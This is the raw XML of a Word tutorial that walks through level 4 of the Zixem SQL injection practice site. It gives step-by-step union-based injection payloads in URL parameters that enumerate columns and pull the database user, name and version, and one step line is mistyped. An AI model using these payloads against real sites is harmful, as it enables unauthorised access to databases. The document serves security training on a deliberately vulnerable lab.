          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:b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Now we will solve Level 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="5B3FC527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261594B0" wp14:editId="24F5E880">
                <wp:extent cx="5943600" cy="2832100"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="1685220425" name="Group 1685220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32100"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="5943600" cy="2819400"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1136767812" name="Shape 48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7924891" name="Rectangle 407924891"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2381700" y="2671900"/>
                            <a:ext cx="1410900" cy="130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580081DB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85220425" style="width:468pt;height:223pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,28194" coordorigin="1524,1524" o:spid="_x0000_s1077" w14:anchorId="261594B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">
                <v:shape id="Shape 48" style="position:absolute;left:1524;top:1524;width:59436;height:28194;visibility:visible;mso-wrap-style:square" o:spid="_x0000_s1078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">
                  <v:imagedata o:title="" r:id="rId43"/>
                </v:shape>
                <v:rect id="Rectangle 407924891" style="position:absolute;left:23817;top:26719;width:14109;height:1302;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:spid="_x0000_s1079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580081DB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387B55AA" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/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E923532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w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="08E531B2" wp14:editId="5BB0402C">
            <wp:extent cx="5943600" cy="2298700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2CDF" w:rsidRDefault="003A2CDF" w14:paraId="7A0FA237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44CF1D47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139AAEE7" wp14:editId="3034A25F">
                <wp:extent cx="5943600" cy="508000"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="1926866846" name="Group 1926866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000"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="5943600" cy="485775"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="178635098" name="Shape 28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7198786" name="Rectangle 557198786"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="600425" y="330225"/>
                            <a:ext cx="2882100" cy="2202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7A836E08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26866846" style="width:468pt;height:40pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,4857" coordorigin="1524,1524" o:spid="_x0000_s1080" w14:anchorId="139AAEE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">
                <v:shape id="Shape 28" style="position:absolute;left:1524;top:1524;width:59436;height:4857;visibility:visible;mso-wrap-style:square" o:spid="_x0000_s1081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">
                  <v:imagedata o:title="" r:id="rId46"/>
                </v:shape>
                <v:rect id="Rectangle 557198786" style="position:absolute;left:6004;top:3302;width:28821;height:2202;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:spid="_x0000_s1082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7A836E08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58A30C07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02113D37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1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> $ SQLi/level4.php?ebookid=7'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="003A2CDF" w14:paraId="6A662432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B877B5D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6E45D0CE" wp14:editId="076854D1">
                <wp:extent cx="5943600" cy="1955800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="764356780" name="Group 764356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55800"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="5943600" cy="1943100"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1436158768" name="Shape 4"/>
                          <pic:cNvPicPr preferRelativeResize="0"/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6207963" name="Rectangle 656207963"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="270200" y="1320950"/>
                            <a:ext cx="5393700" cy="5205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550DB61C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4356780" style="width:468pt;height:154pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,19431" coordorigin="1524,1524" o:spid="_x0000_s1083" w14:anchorId="6E45D0C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">
                <v:shape id="Shape 4" style="position:absolute;left:1524;top:1524;width:59436;height:19431;visibility:visible;mso-wrap-style:square" o:spid="_x0000_s1084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">
                  <v:imagedata o:title="" r:id="rId48"/>
                </v:shape>
                <v:rect id="Rectangle 656207963" style="position:absolute;left:2702;top:13209;width:53937;height:5205;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:spid="_x0000_s1085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550DB61C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47949087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29795AB2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2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQLi/level4.php?ebookid=7' -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="2F99155D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488A91A5" wp14:editId="070237DE">
                <wp:extent cx="5943600" cy="2527300"/>
                <wp:effectExtent l="0" t="0" r="0" b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27300"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="5943600" cy="2514600"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="241418219" name="Shape 8"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId4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1856091" name="Rectangle 2041856091"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1581125" y="1360975"/>
                            <a:ext cx="3295800" cy="1170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29E35E5B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style="width:468pt;height:199pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,25146" coordorigin="1524,1524" o:spid="_x0000_s1086" w14:anchorId="488A91A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">
                <v:shape id="Shape 8" style="position:absolute;left:1524;top:1524;width:59436;height:25146;visibility:visible;mso-wrap-style:square" o:spid="_x0000_s1087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">
                  <v:imagedata o:title="" r:id="rId50"/>
                </v:shape>
                <v:rect id="Rectangle 2041856091" style="position:absolute;left:15811;top:13609;width:32958;height:11709;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:spid="_x0000_s1088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29E35E5B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1ED55B31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7A18286F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>Step 3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> $ SQLi/level4.php?ebookid=7' order by order by 10 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="003A2CDF" w14:paraId="0BD42F07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61CC707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7B25F9B7" wp14:editId="7AE9D8EA">
                <wp:extent cx="5943600" cy="2006600"/>
                <wp:effectExtent l="0" t="0" r="0" b="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006600"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="5943600" cy="1990725"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1682320823" name="Shape 30"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId5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1725453" name="Rectangle 201725453"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="350250" y="1350950"/>
                            <a:ext cx="5303700" cy="3603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4429C2D7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" style="width:468pt;height:158pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,19907" coordorigin="1524,1524" o:spid="_x0000_s1089" w14:anchorId="7B25F9B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">
                <v:shape id="Shape 30" style="position:absolute;left:1524;top:1524;width:59436;height:19907;visibility:visible;mso-wrap-style:square" o:spid="_x0000_s1090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">
                  <v:imagedata o:title="" r:id="rId52"/>
                </v:shape>
                <v:rect id="Rectangle 201725453" style="position:absolute;left:3502;top:13509;width:53037;height:3603;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:spid="_x0000_s1091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4429C2D7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790C4D2D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67F9BE4B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SQLi/level4.php?ebookid=7' order by 5 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="73062254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78337786" wp14:editId="697D4CE2">
                <wp:extent cx="5943600" cy="2565400"/>
                <wp:effectExtent l="0" t="0" r="0" b="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65400"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="5943600" cy="2552700"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="36" name="Shape 36"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId5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248663" name="Rectangle 213248663"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2311650" y="1461050"/>
                            <a:ext cx="2321700" cy="1170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402E0AB3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" style="width:468pt;height:202pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,25527" coordorigin="1524,1524" o:spid="_x0000_s1092" w14:anchorId="78337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">
                <v:shape id="Shape 36" style="position:absolute;left:1524;top:1524;width:59436;height:25527;visibility:visible;mso-wrap-style:square" o:spid="_x0000_s1093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">
                  <v:imagedata o:title="" r:id="rId54"/>
                </v:shape>
                <v:rect id="Rectangle 213248663" style="position:absolute;left:23116;top:14610;width:23217;height:11709;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:spid="_x0000_s1094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402E0AB3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4D5FDD9C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71C5957E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4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQLi/level4.php?ebookid=.07' union select 1,2,3,4,5 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="003A2CDF" w14:paraId="4404EB39" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="0BC0CBA4" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:b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06FB6806" wp14:editId="75D2738F">
                <wp:extent cx="5943600" cy="2667000"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="1203384695" name="Group 1203384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67000"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="5943600" cy="2657475"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="546205529" name="Shape 44"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId5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8935879" name="Rectangle 868935879"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2231575" y="1561100"/>
                            <a:ext cx="2181600" cy="9906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35B574A8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03384695" style="width:468pt;height:210pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,26574" coordorigin="1524,1524" o:spid="_x0000_s1095" w14:anchorId="06FB68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">
                <v:shape id="Shape 44" style="position:absolute;left:1524;top:1524;width:59436;height:26574;visibility:visible;mso-wrap-style:square" o:spid="_x0000_s1096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">
                  <v:imagedata o:title="" r:id="rId56"/>
                </v:shape>
                <v:rect id="Rectangle 868935879" style="position:absolute;left:22315;top:15611;width:21816;height:9906;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:spid="_x0000_s1097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35B574A8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7E51158F" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="07B51DFE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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$ SQLi/level4.php?ebookid=.07' union select 111,2222,3333,4444,5 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="4A4C434F" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="25A83CCC" wp14:editId="42311DB9">
                <wp:extent cx="5943600" cy="2667000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67000"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="5943600" cy="2657475"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1912437696" name="Shape 6"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId5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8914044" name="Rectangle 898914044"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2391700" y="1571125"/>
                            <a:ext cx="1961400" cy="1050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47248B0B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style="width:468pt;height:210pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,26574" coordorigin="1524,1524" o:spid="_x0000_s1098" w14:anchorId="25A83CCC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">
                <v:shape id="Shape 6" style="position:absolute;left:1524;top:1524;width:59436;height:26574;visibility:visible;mso-wrap-style:square" o:spid="_x0000_s1099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">
                  <v:imagedata o:title="" r:id="rId58"/>
                </v:shape>
                <v:rect id="Rectangle 898914044" style="position:absolute;left:23917;top:15711;width:19614;height:10509;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:spid="_x0000_s1100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47248B0B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6ABF03B7" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="3CFE7167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b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SQLi/level4.php?ebookid=.07' union select user(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>),database</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(),version(),4444,5 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="003A2CDF" w14:paraId="085141CE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05636F5" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/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714E2436" wp14:editId="5DD01BEF">
                <wp:extent cx="5943600" cy="2552700"/>
                <wp:effectExtent l="0" t="0" r="0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52700"/>
                          <a:chOff x="152400" y="152400"/>
                          <a:chExt cx="5943600" cy="2543175"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="381232184" name="Shape 18"/>
                          <pic:cNvPicPr preferRelativeResize="0"/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId5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565248" name="Rectangle 163565248"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1901350" y="1481050"/>
                            <a:ext cx="2521800" cy="10509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3A2CDF" w:rsidRDefault="003A2CDF" w14:paraId="20A6D469" w14:textId="7777777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style="width:468pt;height:201pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59436,25431" coordorigin="1524,1524" o:spid="_x0000_s1101" w14:anchorId="714E2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">
                <v:shape id="Shape 18" style="position:absolute;left:1524;top:1524;width:59436;height:25431;visibility:visible;mso-wrap-style:square" o:spid="_x0000_s1102" o:preferrelative="f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">
                  <v:imagedata o:title="" r:id="rId60"/>
                </v:shape>
                <v:rect id="Rectangle 163565248" style="position:absolute;left:19013;top:14810;width:25218;height:10509;visibility:visible;mso-wrap-style:square;v-text-anchor:middle" o:spid="_x0000_s1103" filled="f" strokecolor="red" strokeweight="1.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">
                  <v:stroke joinstyle="round" startarrowwidth="narrow" startarrowlength="short" endarrowwidth="narrow" endarrowlength="short"/>
                  <v:textbox inset="2.53958mm,2.53958mm,2.53958mm,2.53958mm">
                    <w:txbxContent>
                      <w:p w:rsidR="003A2CDF" w:rsidRDefault="003A2CDF" w14:paraId="20A6D469" w14:textId="77777777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A2CDF" w:rsidRDefault="003A2CDF" w14:paraId="7687148A" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="372BF389" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:b/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:b/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Important Notes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="2C2A9CEC" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr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 xml:space="preserve">Only use within legal environments </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="79D2CE84" w14:textId="77777777">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr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t>Never hack live websites without consent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="003A2CDF" w14:paraId="2749946B" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="4CCF8717" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:b/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:b/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A2CDF" w:rsidRDefault="00000000" w14:paraId="507E5C5D" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SQL Injection remains one of the most severe and widespread web vulnerabilities. Within this guide, we walk through how the "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Zixem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Poppins" w:hAnsi="Poppins" w:eastAsia="Poppins" w:cs="Poppins"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>" demo site can be utilized as a secure and tutorial-rich way to comprehend the principles of SQL injection attacks. Working in such controlled environments enables would-be ethical hackers and security experts to identify vulnerabilities, learn about attack methods, and, most importantly — discover how to defend web applications against them. Ensure that your testing is conducted ethically and legally, and apply this knowledge to enhance cybersecurity rather than weaken it.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="003A2CDF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C83FBFFD-C27D-8E46-9AE7-5AAD4807FD0A}" r:id="rId1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w:fontKey="{D50D5312-9C88-0346-958C-5E99B8C638D0}" r:id="rId2"/>
    <w:embedItalic w:fontKey="{3FE4DEC0-094F-8349-9532-DE4F428F925C}" r:id="rId3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  <w:embedRegular w:fontKey="{8322673A-C246-1140-9C5F-858D5B4EF9FC}" r:id="rId4"/>
    <w:embedBold w:fontKey="{71C8F6EA-548D-5946-B146-3156BFBDA33B}" r:id="rId5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C922D9A7-B5D1-7C4E-A30D-95A5E3B5E527}" r:id="rId6"/>
  </w:font>
  <w:font w:name="Cambria">
    <w:panose1 w:val="02040503050406030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
    <w:embedRegular w:fontKey="{99197730-B697-1743-9DF0-549F43CD8AC4}" r:id="rId7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7497B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="70D06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0CA356B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FC423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5D4614"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4E569B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7EB2404"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D1E82B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73075191">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="677267136">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1877690982">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="11736482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2CDF"/>
    <w:rsid w:val="003A2CDF"/>
    <w:rsid w:val="004E6F26"/>
    <w:rsid w:val="00620208"/>
    <w:rsid w:val="00C04A9A"/>
    <w:rsid w:val="00F91B4B"/>
    <w:rsid w:val="483A5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AAD214"/>
  <w15:docId w15:val="{351D1B4F-E471-B24B-9681-B5A9228AB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hAnsi="Arial" w:eastAsia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png" Id="rId39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image" Target="media/image46.png" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png" Id="rId55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49.png" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png" Id="rId1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52.png" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png" Id="rId51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55.png" Id="rId59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media/image50.png" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml" Id="rId6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45.png" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png" Id="rId10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image" Target="media/image48.png" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png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Guest User</lastModifiedBy>
  <revision>4</revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-06-09T10:36:00.0000000Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-23T10:21:23.6516034Z</dcterms:modified>
</coreProperties>
</file>